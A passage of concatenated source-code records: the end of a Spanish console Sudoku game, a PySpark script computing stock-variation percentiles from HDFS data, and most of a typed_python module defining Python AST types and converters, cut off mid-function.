Normal. A continuación se muestra el sudoku a resolver:\\n\")\n return \"setsudokus/set_medio.txt\"\n elif opcion == '3':\n print(\"\\nHas seleccionado la dificultad Dificil. 
A continuación se muestra el sudoku a resolver:\\n\")\n return \"setsudokus/set_dificil.txt\"\n\ndef mostrar_tablero(tablero):\n i = 0\n print(colored(\" 1 2 3 4 5 6 7 8 9\", 'blue'))\n for linea in tablero:\n print(colored(int(i/9 + 1), 'blue') + \" | \", end=\"\")\n for elemento in linea:\n if (i%3 == 0) and (i != 0) and (i%9 != 0):\n print(\"| \", end = \"\")\n if elemento[\"editable\"] :\n print(elemento[\"numero\"], end= \" \")\n else:\n print(colored(elemento[\"numero\"],'red'), end= \" \")\n i += 1\n if i in (27, 54):\n print(\"\\n \" + \"-\" * 22)\n else:\n print(\"\") \n\ndef elegir_opcion_menu(sudoku):\n print(\"\\n1) Ingresar número\")\n print(\"2) Pedir una pista\")\n print(\"3) Limpiar el tablero\")\n print(\"4) Finalizar juego\\n\")\n opcion = input(\"Ingrese la opcion elegida: \")\n \n while(not validar_rango_numero(opcion, 1, 4)):\n opcion = input(\", por favor, intenta de nuevo: \")\n \n if opcion == '1':\n agregar_numero(sudoku)\n elif opcion == '2':\n dar_pista(sudoku)\n elif opcion == '3':\n limpiar_tablero(sudoku)\n elif opcion == '4':\n finalizar(sudoku)\n return False\n return True\n\ndef agregar_numero(tablero):\n coordenada_ingresada = input(\"Ingrese una coordenada\\n(debe ser un numero entre el 11 y el 99 donde el 1er numero es la fila y el 2do la columna): \")\n numero_ingresado = input(\"Ingrese un numero entre el 1 y el 9: \")\n if (len(coordenada_ingresada) == 2 and coordenada_ingresada[0].isdigit() and coordenada_ingresada[1].isdigit() and int(coordenada_ingresada[0]) > 0 and int(coordenada_ingresada[1]) > 0):\n # El -1 es porque la coordenada de la posicion 1x1 en la matriz es la posicion 0x0.\n fila = int(coordenada_ingresada[0]) - 1\n columna = int(coordenada_ingresada[1]) - 1\n if (numero_ingresado.isdigit() and len(numero_ingresado) == 1 and int(numero_ingresado) > 0):\n if tablero[fila][columna]['editable']:\n tablero[fila][columna]['numero'] = numero_ingresado\n else:\n print('\\nLa coordenada ' +\n coordenada_ingresada[0] + 'x' + coordenada_ingresada[1] + ' no puede ser modificada.')\n else:\n print('\\nEl numero ingresado ' +\n numero_ingresado + ' no es un numero valido.')\n else:\n print('\\nLa coordenada ' + coordenada_ingresada +\n ' no es una coordenada valida.')\n\ndef dar_pista(tablero):\n global pistas_restantes\n if pistas_restantes <= 0:\n print(\"No quedan pistas disponibles.\")\n return\n \n if tiene_repeticiones(tablero):\n pistas_restantes -= 1\n else:\n print(\"El sudoku no tiene repeticiones.\")\n \n print(f\"Pistas restantes: {pistas_restantes}\\n\")\n\ndef limpiar_tablero(tablero):\n for linea in tablero:\n for celda in linea:\n if celda['editable']:\n celda['numero'] = '?'\n\ndef finalizar(sudoku):\n if not tiene_repeticiones(sudoku) and sudoku_esta_lleno(sudoku):\n print(\"¡Felicitaciones! Has completado el sudoku correctamente.\\n\")\n else:\n print(\"¡Lo sentimos! 
El sudoku es incorrecto.\\n\")\n print(\"¡Muchas gracias por jugar a Sudoku!\")\n\ndef main():\n clear = lambda: os.system('cls')\n clear()\n ruta_archivo_set = elegir_dificultad()\n sudoku = creador_tablero(ruta_archivo_set)\n condicion = True\n while(condicion):\n mostrar_tablero(sudoku)\n condicion = elegir_opcion_menu(sudoku)\n\nif __name__ == \"__main__\":\n main()","repo_name":"JuampiCarosi/aninfo","sub_path":"proyecto.py","file_name":"proyecto.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9535360198","text":"from operator import itemgetter\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import expr, count\nimport sys,logging\nfrom datetime import datetime\nimport pandas as pd\n\n# Logging configuration\nformatter = logging.Formatter('[%(asctime)s] %(levelname)s @ line %(lineno)d: %(message)s')\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.INFO)\nhandler.setFormatter(formatter)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogger.addHandler(handler)\ndt_string = datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\nAppName = \"Progetto 1 SABD\"\n\ndef parse_map(f):\n x=f.split(sep=\",\")\n return [x[4]+'.'+x[0], x[3], x[2]]\n\ndef variazione(f):\n daily_events = sorted(list(f[1]), key=itemgetter(1))\n var = float(daily_events[len(daily_events)-1][2])-float(daily_events[0][2])\n splitted = f[0].split(sep='.')\n return [splitted[0], splitted[2], var, 2]\n\n\ndef main():\n\n #Creazione dello Spark Context\n spark = SparkSession.builder.appName(AppName+\"_\"+str(dt_string)).getOrCreate()\n spark.sparkContext.setLogLevel(\"ERROR\")\n logger.info(\"Starting spark application\")\n\n #Lettura del dataset da HDFS e trasformazione in dataframe\n logger.info(\"Reading CSV File\")\n df = spark.sparkContext.textFile(\"hdfs://master:54310/cartellaNIFI/out500_combined+header.csv\")\\\n .map(parse_map)\\\n .groupBy(lambda f:f[0])\\\n .filter(lambda f:len(f[1])>1)\\\n .map(variazione)\\\n .toDF(schema=[\"data\", \"borsa\", \"valore\", \"count\"])\n \n #Calcolo percentili e eventi considerati con i dataframe\n df = df.groupBy(['data', 'borsa']).agg(expr(\"percentile_approx(valore, 0.25)\").alias('Percentile25th'),\\\n expr(\"percentile_approx(valore, 0.50)\").alias('Percentile50th'),\\\n expr(\"percentile_approx(valore, 0.75)\").alias('Percentile75th'),\\\n expr(\"sum(count) as total_count\").alias('total_count'))\\\n .coalesce(1).write.mode('overwrite').option('header','true').csv(\"hdfs://master:54310/cartellaResult/Query3Result\")\n \n #pd.DataFrame(df.collect()).to_csv(\"hdfs://master:54310/cartellaResult/Query3Result\", header=True)\n \n spark.stop()\n return None\n\nif __name__ == '__main__':\n main()\n sys.exit()\n","repo_name":"kobero98/SABD_Progetto1","sub_path":"Spark_scripts/query3_df.py","file_name":"query3_df.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15764657884","text":"import sys\nimport ast\nimport typed_python.compiler.python_ast_util as python_ast_util\nimport types\nimport traceback\n\nfrom typed_python._types import Forward, Alternative, TupleOf, OneOf\n\n\n# forward declarations.\nModule = Forward(\"Module\")\nStatement = Forward(\"Statement\")\nExpr = Forward(\"Expr\")\nArg = Forward(\"Arg\")\nNumericConstant = Forward(\"NumericConstant\")\nExprContext = Forward(\"ExprContext\")\nBooleanOp = 
Forward(\"BooleanOp\")\nBinaryOp = Forward(\"BinaryOp\")\nUnaryOp = Forward(\"UnaryOp\")\nComparisonOp = Forward(\"ComparisonOp\")\nComprehension = Forward(\"Comprehension\")\nExceptionHandler = Forward(\"ExceptionHandler\")\nArguments = Forward(\"Arguments\")\nKeyword = Forward(\"Keyword\")\nAlias = Forward(\"Alias\")\nWithItem = Forward(\"WithItem\")\nTypeIgnore = Forward(\"TypeIgnore\")\n\nModule = Module.define(Alternative(\n \"Module\",\n Module={\n \"body\": TupleOf(Statement),\n **({\"type_ignores\": TupleOf(TypeIgnore)} if sys.version_info.minor >= 8 else {})\n },\n Expression={'body': Expr},\n Interactive={'body': TupleOf(Statement)},\n Suite={\"body\": TupleOf(Statement)}\n))\n\nTypeIgnore = TypeIgnore.define(Alternative(\n \"TypeIgnore\",\n Item={'lineno': int, 'tag': str}\n))\n\n\ndef statementStrLines(self):\n if self.matches.FunctionDef:\n yield f\"def {self.name}(...):\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n return\n\n elif self.matches.Expr:\n yield str(self.value)\n\n elif self.matches.If:\n yield f\"if {self.test}:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.orelse:\n yield \"else:\"\n for s in self.orelse:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.While:\n yield f\"while {self.test}:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.orelse:\n yield \"else:\"\n for s in self.orelse:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.Try:\n yield \"try:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n for eh in self.handlers:\n yield f\"except {eh.type}\" + (f\" as {eh.name}\")\n for s in eh.body:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.orelse:\n yield \"else:\"\n for s in self.orelse:\n for line in statementStrLines(s):\n yield \" \" + line\n if self.finalbody:\n yield \"finally:\"\n for s in self.finalbody:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.With:\n yield f\"with {self.items}:\"\n for s in self.body:\n for line in statementStrLines(s):\n yield \" \" + line\n\n elif self.matches.Assign:\n yield f\"{', '.join(str(x) for x in self.targets)} = {self.value}\"\n\n elif self.matches.AugAssign:\n yield f\"{self.target} {self.op}= {self.value}\"\n\n elif self.matches.Raise:\n res = \"raise\"\n if self.exc is not None:\n res += \" \" + str(self.exc)\n\n if self.cause is not None:\n res += \" from \" + str(self.cause)\n\n yield res\n\n elif self.matches.Break:\n yield \"break\"\n\n elif self.matches.Continue:\n yield \"continue\"\n\n elif self.matches.Pass:\n yield \"pass\"\n\n elif self.matches.Return:\n if self.value is not None:\n yield f\"return {self.value}\"\n else:\n yield \"return\"\n else:\n yield str(type(self)) + \"...\"\n\n\ndef StatementStr(self):\n return \"\\n\".join(list(statementStrLines(self)))\n\n\nStatement = Statement.define(Alternative(\n \"Statement\",\n FunctionDef={\n \"name\": str,\n \"args\": Arguments,\n \"body\": TupleOf(Statement),\n \"decorator_list\": TupleOf(Expr),\n \"returns\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n ClassDef={\n \"name\": str,\n \"bases\": TupleOf(Expr),\n \"keywords\": TupleOf(Keyword),\n \"body\": TupleOf(Statement),\n \"decorator_list\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Return={\n \"value\": OneOf(Expr, None),\n 'line_number': int,\n 
'col_offset': int,\n 'filename': str\n },\n Delete={\n \"targets\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Assign={\n \"targets\": TupleOf(Expr),\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AugAssign={\n \"target\": Expr,\n \"op\": BinaryOp,\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Print={\n \"expr\": OneOf(Expr, None),\n \"values\": TupleOf(Expr),\n \"nl\": int,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n For={\n \"target\": Expr,\n \"iter\": Expr,\n \"body\": TupleOf(Statement),\n \"orelse\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n While={\n \"test\": Expr,\n \"body\": TupleOf(Statement),\n \"orelse\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n If={\n \"test\": Expr,\n \"body\": TupleOf(Statement),\n \"orelse\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n With={\n \"items\": TupleOf(WithItem),\n \"body\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Raise={\n \"exc\": OneOf(Expr, None),\n \"cause\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Try={\n \"body\": TupleOf(Statement),\n \"handlers\": TupleOf(ExceptionHandler),\n \"orelse\": TupleOf(Statement),\n \"finalbody\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Assert={\n \"test\": Expr,\n \"msg\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Import={\n \"names\": TupleOf(Alias),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n ImportFrom={\n \"module\": OneOf(str, TupleOf(str)),\n \"names\": OneOf(Alias, TupleOf(Alias)),\n \"level\": OneOf(int, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Global={\n \"names\": TupleOf(str),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Expr={\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Pass={\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Break={\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Continue={\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AsyncFunctionDef={\n \"name\": str,\n \"args\": Arguments,\n \"body\": TupleOf(Statement),\n \"decorator_list\": TupleOf(Expr),\n \"returns\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AnnAssign={\n \"target\": Expr,\n \"annotation\": Expr,\n 'simple': int,\n \"value\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AsyncWith={\n \"items\": TupleOf(WithItem),\n \"body\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n AsyncFor={\n 'target': Expr,\n 'iter': Expr,\n 'body': TupleOf(Statement),\n 'orelse': TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n NonLocal={\n \"names\": TupleOf(str),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n __str__=StatementStr\n))\n\n\ndef ExpressionStr(self):\n if self.matches.ListComp:\n res = \"[\" + str(self.elt)\n for gen in self.generators:\n res += \" for \" + str(gen.target) + \" in \" + str(gen.iter)\n for ifS in gen.ifs:\n res += \" if \" + str(ifS)\n return res + \"]\"\n\n if self.matches.Lambda:\n 
return \"(lambda ...: \" + str(self.body) + \")\"\n\n if self.matches.Subscript:\n return str(self.value) + \"[\" + str(self.slice) + \"]\"\n\n if self.matches.Num:\n return str(self.n)\n\n if self.matches.Call:\n return (\n f\"({self.func})(\" +\n \", \".join([str(x) for x in self.args] + [f\"{kwd.arg}={kwd.value}\" for kwd in self.keywords])\n + \")\"\n )\n\n if self.matches.Str:\n return repr(self.s)\n\n if self.matches.Compare:\n res = str(self.left)\n for i in range(len(self.ops)):\n if self.ops[i].matches.Eq:\n sep = \"==\"\n if self.ops[i].matches.NotEq:\n sep = \"!=\"\n if self.ops[i].matches.Lt:\n sep = \"<\"\n if self.ops[i].matches.LtE:\n sep = \"<=\"\n if self.ops[i].matches.Gt:\n sep = \">\"\n if self.ops[i].matches.GtE:\n sep = \">=\"\n if self.ops[i].matches.Is:\n sep = \"is\"\n if self.ops[i].matches.IsNot:\n sep = \"is not\"\n if self.ops[i].matches.In:\n sep = \"in\"\n if self.ops[i].matches.NotIn:\n sep = \"not in\"\n\n res += f\" {sep} {self.comparators[i]}\"\n return res\n\n if self.matches.BoolOp:\n sep = \" and \" if self.op.matches.And else \" or \"\n return sep.join([f\"({x})\" for x in self.values])\n\n if self.matches.BinOp:\n if self.op.matches.Add:\n sep = \"+\"\n if self.op.matches.Sub:\n sep = \"-\"\n if self.op.matches.Mult:\n sep = \"*\"\n if self.op.matches.Div:\n sep = \"/\"\n if self.op.matches.Mod:\n sep = \"%\"\n if self.op.matches.Pow:\n sep = \"**\"\n if self.op.matches.LShift:\n sep = \"<<\"\n if self.op.matches.RShift:\n sep = \">>\"\n if self.op.matches.BitOr:\n sep = \"|\"\n if self.op.matches.BitXor:\n sep = \"^\"\n if self.op.matches.BitAnd:\n sep = \"&\"\n if self.op.matches.FloorDiv:\n sep = \"//\"\n if self.op.matches.MatMult:\n sep = \"@\"\n\n return f\"({self.left}) {sep} ({self.right})\"\n\n if self.matches.UnaryOp:\n if self.op.matches.Invert:\n sep = \"~\"\n if self.op.matches.Not:\n sep = \"not \"\n if self.op.matches.UAdd:\n sep = \"+\"\n if self.op.matches.USub:\n sep = \"-\"\n\n return f\"{sep} ({self.operand})\"\n\n if self.matches.Attribute:\n return f\"({self.value}).{self.attr}\"\n\n if self.matches.Yield:\n if self.value is None:\n return \"yield\"\n else:\n return f\"yield {self.value}\"\n\n if self.matches.Name:\n return self.id\n\n return str(type(self))\n\n\nExpr = Expr.define(Alternative(\n \"Expr\",\n BoolOp={\n \"op\": BooleanOp,\n \"values\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n BinOp={\n \"left\": Expr,\n \"op\": BinaryOp,\n \"right\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n UnaryOp={\n \"op\": UnaryOp,\n \"operand\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Lambda={\n \"args\": Arguments,\n \"body\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n IfExp={\n \"test\": Expr,\n \"body\": Expr,\n \"orelse\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Dict={\n \"keys\": TupleOf(OneOf(None, Expr)),\n \"values\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Set={\n \"elts\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n ListComp={\n \"elt\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n SetComp={\n \"elt\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n DictComp={\n \"key\": Expr,\n \"value\": Expr,\n \"generators\": TupleOf(Comprehension),\n 
'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n GeneratorExp={\n \"elt\": Expr,\n \"generators\": TupleOf(Comprehension),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Yield={\n \"value\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Compare={\n \"left\": Expr,\n \"ops\": TupleOf(ComparisonOp),\n \"comparators\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Call={\n \"func\": Expr,\n \"args\": TupleOf(Expr),\n \"keywords\": TupleOf(Keyword),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Num={\n \"n\": NumericConstant,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Str={\n \"s\": str,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Attribute={\n \"value\": Expr,\n \"attr\": str,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Subscript={\n \"value\": Expr,\n \"slice\": Expr,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Name={\n \"id\": str,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n List={\n \"elts\": TupleOf(Expr),\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Tuple={\n \"elts\": TupleOf(Expr),\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Starred={\n \"value\": Expr,\n \"ctx\": ExprContext,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n YieldFrom={\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Await={\n \"value\": Expr,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n JoinedStr={\n \"values\": TupleOf(Expr),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Bytes={\n 's': bytes,\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Constant={\n 'value': OneOf(object, None),\n **({'kind': OneOf(None, str)} if sys.version_info.minor >= 8 else {}),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n FormattedValue={\n \"value\": Expr,\n \"conversion\": OneOf(int, None),\n \"format_spec\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n Slice={\n \"lower\": OneOf(Expr, None),\n \"upper\": OneOf(Expr, None),\n \"step\": OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n },\n __str__=ExpressionStr\n))\n\nNumericConstant = NumericConstant.define(Alternative(\n \"NumericConstant\",\n Int={\"value\": int},\n Long={\"value\": str},\n Boolean={\"value\": bool},\n None_={},\n Float={\"value\": float},\n Complex={\"real\": float, \"imag\": float},\n Unknown={},\n __str__=lambda self: (\n str(self.value) if (\n self.matches.Int or self.matches.Long\n or self.matches.Boolean or self.matches.Float\n ) else \"None\" if self.matches.None_ else\n f\"{self.real} + {self.imag}j\" if self.matches.Complex else \"Unknown\"\n )\n))\n\nExprContext = ExprContext.define(Alternative(\n \"ExprContext\",\n Load={},\n Store={},\n Del={},\n AugLoad={},\n AugStore={},\n Param={}\n))\n\nBooleanOp = BooleanOp.define(Alternative(\n \"BooleanOp\",\n And={},\n Or={}\n))\n\nBinaryOp = BinaryOp.define(Alternative(\n \"BinaryOp\",\n Add={},\n Sub={},\n Mult={},\n Div={},\n Mod={},\n Pow={},\n LShift={},\n RShift={},\n BitOr={},\n BitXor={},\n BitAnd={},\n FloorDiv={},\n MatMult={}\n))\n\nUnaryOp = UnaryOp.define(Alternative(\n 
\"UnaryOp\",\n Invert={},\n Not={},\n UAdd={},\n USub={}\n))\n\nComparisonOp = ComparisonOp.define(Alternative(\n \"ComparisonOp\",\n Eq={},\n NotEq={},\n Lt={},\n LtE={},\n Gt={},\n GtE={},\n Is={},\n IsNot={},\n In={},\n NotIn={}\n))\n\nComprehension = Comprehension.define(Alternative(\n \"Comprehension\",\n Item={\n \"target\": Expr,\n \"iter\": Expr,\n \"ifs\": TupleOf(Expr),\n \"is_async\": bool\n }\n))\n\nExceptionHandler = ExceptionHandler.define(Alternative(\n \"ExceptionHandler\",\n Item={\n \"type\": OneOf(Expr, None),\n \"name\": OneOf(str, None),\n \"body\": TupleOf(Statement),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n }\n))\n\nArguments = Arguments.define(Alternative(\n \"Arguments\",\n Item={\n **({'posonlyargs': TupleOf(Arg)} if sys.version_info.minor >= 8 else {}),\n \"args\": TupleOf(Arg),\n \"vararg\": OneOf(Arg, None),\n \"kwonlyargs\": TupleOf(Arg),\n \"kw_defaults\": TupleOf(OneOf(None, Expr)),\n \"kwarg\": OneOf(Arg, None),\n \"defaults\": TupleOf(Expr),\n },\n totalArgCount=lambda self:\n len(self.args)\n + (1 if self.vararg else 0)\n + (1 if self.kwarg else 0)\n + len(self.kwonlyargs),\n argumentNames=lambda self:\n [a.arg for a in self.args]\n + ([self.vararg.arg] if self.vararg else [])\n + [a.arg for a in self.kwonlyargs]\n + ([self.kwarg.arg] if self.kwarg else [])\n))\n\nArg = Arg.define(Alternative(\n \"Arg\",\n Item={\n 'arg': str,\n 'annotation': OneOf(Expr, None),\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n }\n))\n\nKeyword = Keyword.define(Alternative(\n \"Keyword\",\n Item={\n \"arg\": OneOf(None, str),\n \"value\": Expr,\n **({'line_number': int, 'col_offset': int, 'filename': str} if sys.version_info.minor >= 9 else {})\n }\n))\n\nAlias = Alias.define(Alternative(\n \"Alias\",\n Item={\n \"name\": str,\n \"asname\": OneOf(str, None),\n **({\n 'line_number': int,\n 'col_offset': int,\n 'filename': str\n } if sys.version_info.minor >= 10 else {})\n }\n))\n\nWithItem = WithItem.define(Alternative(\n \"WithItem\",\n Item={\n \"context_expr\": Expr,\n \"optional_vars\": OneOf(Expr, None),\n }\n))\n\nnumericConverters = {\n int: lambda x: NumericConstant.Int(value=x),\n bool: lambda x: NumericConstant.Boolean(value=x),\n type(None): lambda x: NumericConstant.None_(),\n float: lambda x: NumericConstant.Float(value=x),\n complex: lambda x: NumericConstant.Complex(real=x.real, imag=x.imag)\n}\n\n\ndef createPythonAstConstant(n, **kwds):\n if type(n) not in numericConverters:\n return Expr.Num(\n n=NumericConstant.Unknown(),\n **kwds\n )\n return Expr.Num(\n n=numericConverters[type(n)](n),\n **kwds\n )\n\n\ndef createPythonAstString(s, **kwds):\n try:\n return Expr.Str(s=str(s), **kwds)\n except Exception:\n return Expr.Num(\n n=NumericConstant.Unknown(),\n **kwds\n )\n\n\ndef makeNameConstant(value, **kwds):\n return Expr.Num(n=numericConverters[type(value)](value), **kwds)\n\n\ndef makeEllipsis(*args):\n return Expr.Constant(value=...)\n\n\ndef makeExtSlice(dims):\n return Expr.Tuple(elts=dims)\n\n\n# map Python AST types to our syntax-tree types (defined `ove)\nconverters = {\n ast.Module: Module.Module,\n ast.Expression: Module.Expression,\n ast.Interactive: Module.Interactive,\n ast.Suite: Module.Suite,\n ast.FunctionDef: Statement.FunctionDef,\n ast.ClassDef: Statement.ClassDef,\n ast.Return: Statement.Return,\n ast.Delete: Statement.Delete,\n ast.Assign: Statement.Assign,\n ast.AugAssign: Statement.AugAssign,\n ast.AnnAssign: Statement.AnnAssign,\n ast.For: Statement.For,\n ast.While: Statement.While,\n ast.If: 
Statement.If,\n    ast.With: Statement.With,\n    ast.Raise: Statement.Raise,\n    ast.Try: Statement.Try,\n    ast.Assert: Statement.Assert,\n    ast.Import: Statement.Import,\n    ast.ImportFrom: Statement.ImportFrom,\n    ast.Global: Statement.Global,\n    ast.Nonlocal: Statement.NonLocal,\n    ast.Expr: Statement.Expr,\n    ast.Pass: Statement.Pass,\n    ast.Break: Statement.Break,\n    ast.Continue: Statement.Continue,\n    ast.BoolOp: Expr.BoolOp,\n    ast.BinOp: Expr.BinOp,\n    ast.UnaryOp: Expr.UnaryOp,\n    ast.Lambda: Expr.Lambda,\n    ast.IfExp: Expr.IfExp,\n    ast.Dict: Expr.Dict,\n    ast.Set: Expr.Set,\n    ast.JoinedStr: Expr.JoinedStr,\n    ast.Bytes: Expr.Bytes,\n    ast.Constant: Expr.Constant,\n    ast.FormattedValue: Expr.FormattedValue,\n    ast.ListComp: Expr.ListComp,\n    ast.AsyncFunctionDef: Statement.AsyncFunctionDef,\n    ast.AsyncWith: Statement.AsyncWith,\n    ast.AsyncFor: Statement.AsyncFor,\n    ast.Await: Expr.Await,\n    ast.SetComp: Expr.SetComp,\n    ast.DictComp: Expr.DictComp,\n    ast.GeneratorExp: Expr.GeneratorExp,\n    ast.Yield: Expr.Yield,\n    ast.YieldFrom: Expr.YieldFrom,\n    ast.Compare: Expr.Compare,\n    ast.Call: Expr.Call,\n    ast.Num: createPythonAstConstant,\n    ast.Str: createPythonAstString,\n    ast.Attribute: Expr.Attribute,\n    ast.Subscript: Expr.Subscript,\n    ast.Name: Expr.Name,\n    ast.NameConstant: makeNameConstant,\n    ast.List: Expr.List,\n    ast.Tuple: Expr.Tuple,\n    ast.Starred: Expr.Starred,\n    ast.Load: ExprContext.Load,\n    ast.Store: ExprContext.Store,\n    ast.Del: ExprContext.Del,\n    ast.AugLoad: ExprContext.AugLoad,\n    ast.AugStore: ExprContext.AugStore,\n    ast.Param: ExprContext.Param,\n    ast.Ellipsis: makeEllipsis,\n    ast.Slice: Expr.Slice,\n    ast.ExtSlice: makeExtSlice,\n    ast.Index: lambda value: value,\n    ast.And: BooleanOp.And,\n    ast.Or: BooleanOp.Or,\n    ast.Add: BinaryOp.Add,\n    ast.Sub: BinaryOp.Sub,\n    ast.Mult: BinaryOp.Mult,\n    ast.MatMult: BinaryOp.MatMult,\n    ast.Div: BinaryOp.Div,\n    ast.Mod: BinaryOp.Mod,\n    ast.Pow: BinaryOp.Pow,\n    ast.LShift: BinaryOp.LShift,\n    ast.RShift: BinaryOp.RShift,\n    ast.BitOr: BinaryOp.BitOr,\n    ast.BitXor: BinaryOp.BitXor,\n    ast.BitAnd: BinaryOp.BitAnd,\n    ast.FloorDiv: BinaryOp.FloorDiv,\n    ast.Invert: UnaryOp.Invert,\n    ast.Not: UnaryOp.Not,\n    ast.UAdd: UnaryOp.UAdd,\n    ast.USub: UnaryOp.USub,\n    ast.Eq: ComparisonOp.Eq,\n    ast.NotEq: ComparisonOp.NotEq,\n    ast.Lt: ComparisonOp.Lt,\n    ast.LtE: ComparisonOp.LtE,\n    ast.Gt: ComparisonOp.Gt,\n    ast.GtE: ComparisonOp.GtE,\n    ast.Is: ComparisonOp.Is,\n    ast.IsNot: ComparisonOp.IsNot,\n    ast.In: ComparisonOp.In,\n    ast.NotIn: ComparisonOp.NotIn,\n    ast.comprehension: Comprehension.Item,\n    ast.excepthandler: lambda x: x,\n    ast.ExceptHandler: ExceptionHandler.Item,\n    ast.arguments: Arguments.Item,\n    ast.arg: Arg.Item,\n    ast.keyword: Keyword.Item,\n    ast.alias: Alias.Item,\n    ast.withitem: WithItem.Item,\n    # the key must be the ast class itself (not a string) so that lookups by node type succeed\n    **({ast.type_ignore: TypeIgnore.Item} if sys.version_info.minor >= 8 else {}),\n}\n\n# most converters map to an alternative type\nreverseConverters = {\n    t: v for v, t in converters.items()\n    if hasattr(t, '__typed_python_category__') and t.__typed_python_category__ == \"ConcreteAlternative\"\n}\n\n\ndef convertAlgebraicArgs(pyAst, *members):\n    members = [x for x in members if x not in ['line_number', 'col_offset']]\n    return {m: convertAlgebraicToPyAst(getattr(pyAst, m)) for m in members}\n\n\ndef convertAlgebraicToPyAst(pyAst):\n    res = convertAlgebraicToPyAst_(pyAst)\n\n    if hasattr(pyAst, \"line_number\"):\n        res.lineno = pyAst.line_number\n        res.col_offset = pyAst.col_offset\n\n    return res\n\n\ndef convertAlgebraicToSlice(pyAst):\n    if sys.version_info.minor >= 9:\n        return 
